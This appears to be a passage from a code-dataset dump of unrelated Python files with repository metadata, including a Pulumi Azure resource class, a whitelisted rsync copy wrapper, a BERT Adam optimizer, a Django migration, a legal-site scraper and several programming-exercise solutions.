__props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
__props__.__dict__["application_group_type"] = None
__props__.__dict__["description"] = None
__props__.__dict__["friendly_name"] = None
__props__.__dict__["host_pool_arm_path"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["workspace_arm_path"] = None
return ApplicationGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Output[str]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> pulumi.Output[Optional[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Output[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="workspaceArmPath")
def workspace_arm_path(self) -> pulumi.Output[str]:
"""
Workspace arm path of ApplicationGroup.
"""
return pulumi.get(self, "workspace_arm_path")
| [
"[email protected]"
] | |
279eed71489f31473bd2805be9982a3c27f59f15 | 5a0122509b4e7e15e556460d261d9d8a1cee76ad | /enterprise/legacy/util/secure_copy.py | 2b45a64a6226ff68dc4b81f67bf5df35ab3997ac | [] | no_license | cash2one/BHWGoogleProject | cec4d5353f6ea83ecec0d0325747bed812283304 | 18ecee580e284705b642b88c8e9594535993fead | refs/heads/master | 2020-12-25T20:42:08.612393 | 2013-04-13T14:01:37 | 2013-04-13T14:01:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,671 | py | #!/usr/bin/python2.4
#
# Copyright 2006 Google Inc. All Rights Reserved.
"""
A script that can be used to copy files safely. It is intended to
be run as root by secure_script_wrapper, which has a limited list of
scripts that it runs, but does not limit the arguments for those
scripts. Thus, I created this rsync wrapper which, in turn, checks for
arguments and accepts only pairs of files from its list. This prevents
someone from overwriting files at random.
Usage:
secure_copy.py machine file tmpdir
"""
__author__ = '[email protected]'
import sys
import os
import string
from google3.pyglib import logging
import re
# Whitelist of files that secure_copy.py is allowed to copy.
# [\w\.]+ matches a string of at least 1 alphanumeric character and/or period.
FILES = [
"^/export/hda3/[\w\.]+/local/conf/certs/server.crt$",
"^/export/hda3/[\w\.]+/local/conf/certs/server.key$"
]
def CopyFile(machine, file, tmpdir):
for FILE in FILES:
if re.compile(FILE).match(file):
err = os.system("rsync -e ssh -c -a -T %s %s:%s %s" % (tmpdir, machine,
file, file))
return err != 0
logging.error("Attempting to copy unsecure file %s from %s as root "
"(tmpdir=%s). See whitelist in secure_copy.py." %
(file, machine, tmpdir))
return 1
def main(argv):
if len(argv) != 3:
return __doc__
return CopyFile(argv[0], argv[1], argv[2])
############################################################################
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
############################################################################
| [
"[email protected]"
] | |
8d0d4c4039653373109cc15e7bb85a259398b3e2 | f59a104bc669d380f869e7156f0fff1b29d05190 | /FPAIT/show_data.py | 641a9c5edddaf32e17a2235ec35e1762cf138787 | [] | no_license | pratikm141/DXY-Projects | 479049fe8bad34e91b6f31f8fee5f6e5da763a6d | 497257de46416bfc2428f7ce3d1c75f9c8d1d737 | refs/heads/master | 2020-12-13T04:20:54.203204 | 2020-01-16T12:02:57 | 2020-01-16T12:02:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | import os, pdb, json, sys, torch
import numpy as np
from pathlib import Path
lib_path = str((Path(__file__).parent.resolve() / 'lib').resolve())
if lib_path not in sys.path: sys.path.insert(0, lib_path)
from datasets import TICSample, TQASample
def show_vqa(data):
all_words = data['all_words']
words_index = data['words_index']
all_answers = data['all_answers']
answers_index = data['answers_index']
training = data['training']
testing = data['testing']
print ('Few-shot VQA:')
print (' ->> {:} training samples, {:} testing samples'.format(len(training), len(testing)))
for idx, x in enumerate(training):
if idx < 3:
print (' ->> {:}/{:} : {:}'.format(idx, len(training), x))
def show_ic(data):
all_words = data['all_words']
all_blanks = data['all_blanks']
words2index = data['words2index']
training = data['training']
testing = data['testing']
print ('Few-shot Image Caption:')
print (' ->> {:} training samples, {:} testing samples'.format(len(training), len(testing)))
for idx, x in enumerate(training):
if idx < 3:
print (' ->> {:}/{:} : {:}'.format(idx, len(training), x))
if __name__ == '__main__':
vqa_list_path = './data/Toronto-COCO-QA/object.pth'
vqa_list = torch.load(vqa_list_path)
show_vqa(vqa_list)
print ('')
ic_list_path = './data/COCO-Caption/few-shot-coco.pth'
ic_list = torch.load(ic_list_path)
show_ic(ic_list)
| [
"[email protected]"
] | |
cd431507c5fc12ee3a008f88a24e2287be30d3bc | 59107025a7f9afe0f94d194d547d0354e11ff6e7 | /BrushingUp/challenge-1.0/1.1.1.py | f1752408adf04e930fbe972cee76912f013b3ec6 | [
"MIT"
] | permissive | samirsaravia/Python_101 | 083856643a5ca132f7126bb9a6b51b3805ba6bbe | 0c45f11d74a356514a0c436ade6af4c0f67c56b7 | refs/heads/master | 2022-12-19T16:12:20.751592 | 2020-10-19T12:30:18 | 2020-10-19T12:30:18 | 251,749,435 | 0 | 0 | MIT | 2020-10-19T12:45:40 | 2020-03-31T21:42:36 | Python | UTF-8 | Python | false | false | 393 | py | """
Write a function that calculates the sum of all integers up to n.Use the
iterative method and the formula and compare the results.
(sum of n integers given by S = (n(n+1))/2)
"""
def check_sum(number: int):
sum1 = 0
for i in range(1, number + 1):
print(i)
sum1 = sum1 + i
sum2 = number * (number + 1) / 2 # s = n*(n+1)/2
print(sum1, sum2)
check_sum(3)
| [
"[email protected]"
] | |
98c593c049d3a848c1934ecead08298d9fe34a8c | 2118f244be2e09508e3c89dee432d4a75343b430 | /Python Docs/Web Crawlers/To Add or To Do/Interesting2/my_good_scraper_leagle.py | 8e012917eacef3ace6263248a136a549365a23b0 | [] | no_license | RamiJaloudi/Python-Scripts | 91d139093a95f9498a77b1df8ec2f790c4f4dd4c | 37e740a618ae543a02c38dc04a32ef95202ff613 | refs/heads/master | 2020-04-29T14:55:41.108332 | 2019-03-18T05:42:06 | 2019-03-18T05:42:06 | 176,212,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,249 | py | from bs4 import BeautifulSoup
import urllib, urlparse, re
def response(url):
urls = [url] #stack of urls to scrape
visited = [url] #historical record of urls
while len(urls) >0:
try:
htmltext = urllib.urlopen(urls[0])
text = htmltext.read()
except:
print(urls[0])
#soup = BeautifulSoup(htmltext)
urls.pop(0) #print len(urls)
#print (soup.findAll('a', href=True))
pat1 = re.compile(r'<h3>.+?</h3>', re.I|re.M)
title1 = re.findall(pat1, str(text))
print title1
print '\n\n\n'
saveFile = open ('leagle_findall.txt','a')
saveFile.write(str(title1) + '\n\n\n')
pat2 = re.compile(r'<h4></h4><p>.+?</p>', re.I|re.M)
title2 = re.findall(pat2, str(text))
print title2
print '\n\n\n'
saveFile = open ('leagle_findall.txt','a')
saveFile.write(str(title2) + '\n\n\n')
## pat3 = re.compile(r'<h4></h4><p>.+?</a>', re.I|re.M)
## title3 = re.findall(pat3, str(text))
## print title3
## print '\n\n\n'
## saveFile = open ('leagle_findall.txt','a')
## saveFile.write(str(title3) + '\n\n\n')
##
## saveFile.close()
##def response_tag_href(url):
## urls = [url] #stack of urls to scrape
## visited = [url] #historical record of urls
## while len(urls) >0:
## try:
## htmltext = urllib.urlopen(urls[0]).read()
## except:
## print(urls[0])
## soup = BeautifulSoup(htmltext)
## urls.pop(0) #print len(urls)
## #print (soup.findAll('a', href=True))
## for tag in soup.findAll('a', href=True):
## tag['href'] = urlparse.urljoin(url,tag['href'])
## if url in tag['href'] and tag['href'] not in visited:
## urls.append(tag['href'])
## visited.append(tag['href']) # historical record, whereas above line is temporary stack or queue
## # print visited
## print tag['href']
if __name__=='__main__':
print response('http://leagle.com/featured-decisions')
#print response_tag_href('http://leagle.com/decisions/latest/New%20Jersey')
| [
"[email protected]"
] | |
eb19e01a42618f687a04943c13d5c89c97b37dec | a75ac3c5c641fc00a3c403b08eeb6008f648639e | /LeetCode/832.py | 331d5d80ef7b89667b4bd89e0f838c52fcf341aa | [] | no_license | Greenwicher/Competitive-Programming | 5e9e667867c2d4e4ce68ad1bc34691ff22e2400a | 6f830799f3ec4603cab8e3f4fbefe523f9f2db98 | refs/heads/master | 2018-11-15T15:25:22.059036 | 2018-09-09T07:57:28 | 2018-09-09T07:57:28 | 28,706,177 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | class Solution:
def flipAndInvertImage(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return [[1-A[i][-j-1] for j in range(len(A[i]))] for i in range(len(A))] | [
"[email protected]"
] | |
a9d29ebbde702add18b5001944a1e3609c515593 | d779bf5c892830d8810d079ab64b404674049586 | /dajare_detector/utils/base_task.py | 708e794b47f2b9b3c0741edd26739f4636f56a97 | [
"MIT"
] | permissive | vaaaaanquish/dajare-detector | 74d449a8ab5be2dd753551667cc73a2ed4f462fb | e8f2d6c861dc0e03b6bc38ba64463bf95376f949 | refs/heads/main | 2023-01-31T10:52:39.859129 | 2020-12-11T03:29:36 | 2020-12-11T03:29:36 | 318,274,737 | 15 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import gokart
class DajareTask(gokart.TaskOnKart):
task_namespace = 'dajare'
| [
"[email protected]"
] | |
553fe2e6a47849a07c61ce50b28647576ae753b8 | 23130cd12e38dbce8db8102810edaad70b240ae2 | /lintcode/1375.2.py | 58bb3bdee68016c8f1865176bbbb0531b4055727 | [
"MIT"
] | permissive | kangli-bionic/algorithm | ee6687c82101088db20f10fb958b4e45e97d3d31 | c3c38723b9c5f1cc745550d89e228f92fd4abfb2 | refs/heads/master | 2023-01-05T09:29:33.204253 | 2020-10-25T17:29:38 | 2020-10-25T17:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | """
1375. Substring With At Least K Distinct Characters
"""
class Solution:
"""
@param s: a string
@param k: an integer
@return: the number of substrings there are that contain at least k distinct characters
"""
def kDistinctCharacters(self, s, k):
# Write your code here
n = len(s)
left = 0
count = [0] * 256
distinct_count = 0
substring_count = 0
for right in range(n):
count[ord(s[right])] += 1
if count[ord(s[right])] == 1:
distinct_count += 1
while left <= right and distinct_count >= k:
substring_count += n - right
count[ord(s[left])] -= 1
if count[ord(s[left])] == 0:
distinct_count -= 1
left += 1
return substring_count
| [
"[email protected]"
] | |
7241e0a95fca5db510f0dcef217558f23e7b7581 | 6db3955c3a1f0fa1d1effbe18844853df65dfeab | /lib/utils/optimization.py | 6f39283536094ec71cb8b85b3653a871f1e65e85 | [] | no_license | ZhuGeKongKong/OS-SGG | 8222c2d98b204a474f6f96b1bdaf08fc2fd4216a | c0648209598db475f2a369af833f26f4d6b50ddc | refs/heads/master | 2023-09-05T01:30:11.202473 | 2021-10-09T08:35:15 | 2021-10-09T08:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,103 | py | # coding=utf-8
# Copyright 2019 project LXRT
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch optimization for BERT model."""
import math
import torch
from torch.optim import Optimizer
from torch.optim.optimizer import required
import logging
logger = logging.getLogger(__name__)
def warmup_cosine(x, warmup=0.002):
if x < warmup:
return x/warmup
return 0.5 * (1.0 + torch.cos(math.pi * x))
def warmup_constant(x, warmup=0.002):
""" Linearly increases learning rate over `warmup`*`t_total` (as provided to BertAdam) training steps.
Learning rate is 1. afterwards. """
if x < warmup:
return x/warmup
return 1.0
def warmup_linear(x, warmup=0.002):
""" Specifies a triangular learning rate schedule where peak is reached at `warmup`*`t_total`-th (as provided to BertAdam) training step.
After `t_total`-th training step, learning rate is zero. """
if x < warmup:
return x/warmup
return max((x-1.)/(warmup-1.), 0)
SCHEDULES = {
'warmup_cosine': warmup_cosine,
'warmup_constant': warmup_constant,
'warmup_linear': warmup_linear,
}
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
"""
def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear',
b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
max_grad_norm=1.0):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
warned_for_t_total = False
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# LXRT: grad is clipped outside.
# Add grad clipping
# if group['max_grad_norm'] > 0:
# clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
progress = state['step']/group['t_total']
lr_scheduled = group['lr'] * schedule_fct(progress, group['warmup'])
# warning for exceeding t_total (only active with warmup_linear
if group['schedule'] == "warmup_linear" and progress > 1. and not warned_for_t_total:
logger.warning(
"Training beyond specified 't_total' steps with schedule '{}'. Learning rate set to {}. "
"Please set 't_total' of {} correctly.".format(group['schedule'], lr_scheduled, self.__class__.__name__))
warned_for_t_total = True
# end warning
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
# step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
# No bias correction
# bias_correction1 = 1 - beta1 ** state['step']
# bias_correction2 = 1 - beta2 ** state['step']
return loss | [
"[email protected]"
] | |
6bf4344dab739d65ffab90e5c5672e75c29ea34a | ca384188345d5302c450e8a8c8475e691c1e7e66 | /jm_lms/apps/exercises/migrations/0001_initial.py | b08eebc38ffd6d6b04163b4161e406544cb7f5fb | [] | no_license | EdwardOkech/eDarasa | 8b44154596960ebc9cff8eca481f02eadfff3a9d | 1bd94a4337ebc5519a23e55badb022e65a924601 | refs/heads/master | 2020-03-16T23:32:50.299182 | 2018-05-23T22:51:19 | 2018-05-23T22:51:19 | 133,081,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,564 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='EssayQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
],
options={
'verbose_name': 'Essay Question',
'verbose_name_plural': 'Essay Questions',
},
),
migrations.CreateModel(
name='EssayUserAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.TextField(null=True, blank=True)),
('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.CreateModel(
name='Exercise',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=256, null=True)),
],
),
migrations.CreateModel(
name='ExerciseSubmission',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(auto_now_add=True)),
('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
('student', models.ForeignKey(related_name='exercise_submissions', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Exercise Submission',
'verbose_name_plural': 'Exercise Submissions',
},
),
migrations.CreateModel(
name='MultiChoiceQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
('forward_to_exercise', models.ManyToManyField(related_name='forwarded_exercises_answers_mc', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True)),
],
options={
'verbose_name': 'Multiple Choice Question',
'verbose_name_plural': 'Multiple Choice Questions',
},
),
migrations.CreateModel(
name='MultiChoiceQuestionOption',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('content', models.CharField(help_text='Enter the answer text that you want displayed', max_length=1000, verbose_name='Answer Content')),
('correct', models.BooleanField(default=False, help_text='Is this a correct answer?', verbose_name='Correct')),
('question', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestion')),
],
options={
'verbose_name': 'MultiChoice Option',
'verbose_name_plural': 'MultiChoice Options',
},
),
migrations.CreateModel(
name='MultiChoiceUserSubmittedAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
('exercise_submission', models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True)),
('question', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestion')),
('selected_choice', models.ForeignKey(verbose_name='Question', to='exercises.MultiChoiceQuestionOption')),
('student', models.ForeignKey(related_name='exercise_submitted_choice', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'MultiChoice Submitted User Answer',
'verbose_name_plural': 'MultiChoice Submitted User Answers',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.TextField(help_text='Exercise Topic Title and description', null=True, verbose_name='Topic Box', blank=True)),
('expected_answer', models.TextField(help_text='How the learner should answer the question. Shown after the question has been answered.', null=True, verbose_name=b'Expected Answer', blank=True)),
('num_of_expected_answers', models.IntegerField(default=1, verbose_name='Number of expected answers')),
('exercise', models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise')),
('forward_to_exercise', models.ManyToManyField(related_name='forwarded_exercises_answers', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True)),
],
options={
'verbose_name': 'List Question',
'verbose_name_plural': 'List Questions',
},
),
migrations.CreateModel(
name='UserAnswer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('answer', models.CharField(max_length=256, null=True)),
('answered_on', models.DateTimeField(auto_now_add=True, null=True)),
('exercise_submission', models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True)),
('question', models.ForeignKey(verbose_name='Question', to='exercises.Question')),
('student', models.ForeignKey(related_name='exercise_answers', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('id',),
'verbose_name': 'User Answer to List Question',
'verbose_name_plural': 'User Answers to List Question',
},
),
migrations.AddField(
model_name='essayuseranswer',
name='exercise_submission',
field=models.ForeignKey(verbose_name='Exercise Submission', blank=True, to='exercises.ExerciseSubmission', null=True),
),
migrations.AddField(
model_name='essayuseranswer',
name='question',
field=models.ForeignKey(verbose_name='Question', to='exercises.EssayQuestion'),
),
migrations.AddField(
model_name='essayuseranswer',
name='student',
field=models.ForeignKey(related_name='exercise_essay_answers', verbose_name=b'The Student', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='essayquestion',
name='exercise',
field=models.ForeignKey(verbose_name='Exercise', to='exercises.Exercise'),
),
migrations.AddField(
model_name='essayquestion',
name='forward_to_exercise',
field=models.ManyToManyField(related_name='forwarded_exercises_answers_eq', verbose_name='Forward To Exercise', to='exercises.Exercise', blank=True),
),
]
| [
"[email protected]"
] | |
b02ee6280076a1a7aba6bf14f701d852d0992453 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_81/296.py | 97a24772277f1a41527323306b74fa44d458e410 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | #!/usr/bin/env python
import sys
sys.stdin = open('in.txt')
sys.stdout = open('out.txt', 'w')
cases = int(input())
for caseno in range(1, cases+1):
teams = int(input())
table = [[-1 for i in range(teams)] for j in range(teams)]
for n in range(teams):
s = input()
for i in range(teams):
if s[i] != '.':
num = int(s[i])
table[n][i] = num
wp = [-1 for i in range(teams)]
owp = [-1 for i in range(teams)]
oowp = [-1 for i in range(teams)]
for i in range(teams):
plays = 0
wins = 0
for j in table[i]:
if j >= 0:
plays += 1
if j == 1:
wins += 1
wp[i] = wins/plays
for i in range(teams):
wps = []
t = table[i]
for j in range(teams):
if t[j] >= 0 and i != j:
plays = 0
wins = 0
for k in range(teams):
if table[j][k] >= 0 and k != i:
plays += 1
if table[j][k] == 1:
wins += 1
wps.append(wins/plays)
total = 0
for w in wps:
total += w
owp[i] = total/(len(wps))
for i in range(teams):
owps = []
for j in range(teams):
if table[i][j] >= 0 and owp[j] >= 0:
owps.append(owp[j])
total = 0
for j in owps:
total += j
assert len(owps) > 0
oowp[i] = total / len(owps)
print('Case #' + str(caseno) + ':')
for i in range(teams):
rpi = 0.25*wp[i] + 0.5*owp[i] + 0.25*oowp[i]
print(rpi)
| [
"[email protected]"
] | |
69486fbac13fbdae54d2d9ea6909759c410de0e9 | 9252e8a6a0a042dcbf52ea744df8e708a83293ba | /Easy/Cells_with_Odd_Values_in_a_Matrix/Cells_with_Odd_Values_in_a_Matrix_optimized.py | 53e96db1c231c792b39b89d5cad25ccb7fa500ec | [
"MIT"
] | permissive | nitin3685/LeetCode_Solutions | e50a40b8202154d9a60ec4ec5f1673042e5c2a50 | ab920e96cd27e0b2c3c895ce20853edceef0cce8 | refs/heads/master | 2020-09-10T16:01:49.202909 | 2020-01-07T06:54:40 | 2020-01-07T06:54:40 | 221,750,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | #Weird algorithm for matrix multiplication. just addition will produce result matrix
class Solution:
def oddCells(self, n: int, m: int, indices: List[List[int]]) -> int:
row = [0] * n
col = [0] * m
ans = 0
for r,c in indices:
row[r] += 1
col[c] += 1
for i in range(n):
for j in range(m):
ans += (row[i] + col[j] )%2
return ans
| [
"[email protected]"
] | |
38f849d9166e3168b74edf5dba5e77dd822e6d8f | 0c8a267966edd260177106beb04daad8622ba07f | /outliers/outlier_removal_regression.py | 6dacb7e863edc2c7f38226f50ce916c150858399 | [] | no_license | BrianSipple/Machine_Learning | 9665cec5ba9cc94e0dc06db346ddf18cff19d6a6 | f0848183dba64000ff26a32ec45e97531d2bc758 | refs/heads/master | 2021-01-19T00:44:21.123062 | 2015-02-09T04:17:40 | 2015-02-09T04:17:40 | 29,520,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | #!/usr/bin/python
import random
import numpy
import matplotlib.pyplot as plt
import pickle
from outlier_cleaner import clean_outliers
### load up some practice data with outliers in it
ages = pickle.load( open("practice_outliers_ages.pkl", "r") )
net_worths = pickle.load( open("practice_outliers_net_worths.pkl", "r") )
### ages and net_worths need to be reshaped into 2D numpy arrays
### second argument of reshape command is a tuple of integers: (n_rows, n_columns)
### by convention, n_rows is the number of data points
### and n_columns is the number of features
ages = numpy.reshape( numpy.array(ages), (len(ages), 1))
net_worths = numpy.reshape( numpy.array(net_worths), (len(net_worths), 1))
from sklearn.cross_validation import train_test_split
ages_train, ages_test, net_worths_train, net_worths_test = train_test_split(ages, net_worths, test_size=0.1, random_state=42)
### fill in a regression here! Name the regression object reg so that
### the plotting code below works, and you can see what your regression looks like
from sklearn.linear_model import LinearRegression
reg = LinearRegression()
reg.fit(ages_train, net_worths_train)
print "Initial slope: {}".format(reg.coef_[0])
print "Initial r-square: {}".format(reg.score(ages_test, net_worths_test))
try:
plt.plot(ages, reg.predict(ages), color="blue")
except NameError:
pass
plt.scatter(ages, net_worths)
plt.show()
### identify and remove the most outlier-y points
try:
cleaned_data = clean_outliers(
reg.predict(ages_train),
ages_train,
net_worths_train
)
except NameError as e:
print e
print "your regression object doesn't exist, or isn't name reg"
print "can't make predictions to use in identifying outliers"
### only run this code if clean_outliers is returning data
if len(cleaned_data) > 0:
new_ages, new_net_worths, errors = zip(*cleaned_data)
new_ages = numpy.reshape( numpy.array(new_ages), (len(new_ages), 1))
new_net_worths = numpy.reshape( numpy.array(new_net_worths), (len(new_net_worths), 1))
### refit your cleaned data!
try:
reg.fit(new_ages, new_net_worths)
plt.plot(new_ages, reg.predict(new_ages), color="green")
except NameError:
print "you don't seem to have regression imported/created,"
print " or else your regression object isn't named reg"
print " either way, only draw the scatter plot of the cleaned data"
plt.scatter(new_ages, new_net_worths)
plt.xlabel("Ages after outlier cleaning")
plt.ylabel("Net worths after outlier cleaning")
plt.show()
new_ages_train, new_ages_test, new_net_worths_train, new_net_worths_test = train_test_split(
new_ages,
new_net_worths,
test_size=0.1,
random_state=42
)
#reg.fit(new_ages_train, new_net_worths_train)
print "New slope after cleaning: {}".format(reg.coef_[0])
print "New r-square after cleaning: {}".format(reg.score(ages_test, net_worths_test))
else:
print "outlierCleaner() is returning an empty list, no refitting to be done"
| [
"[email protected]"
] | |
92a0bb27897639054e7533cddc6acd682423d77c | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /Geometry/CMSCommonData/python/trackerOnlyGeometryXML_cfi.py | f45cab690a01a80f5eefdb6cab11e640c7b7e4a5 | [
"Apache-2.0"
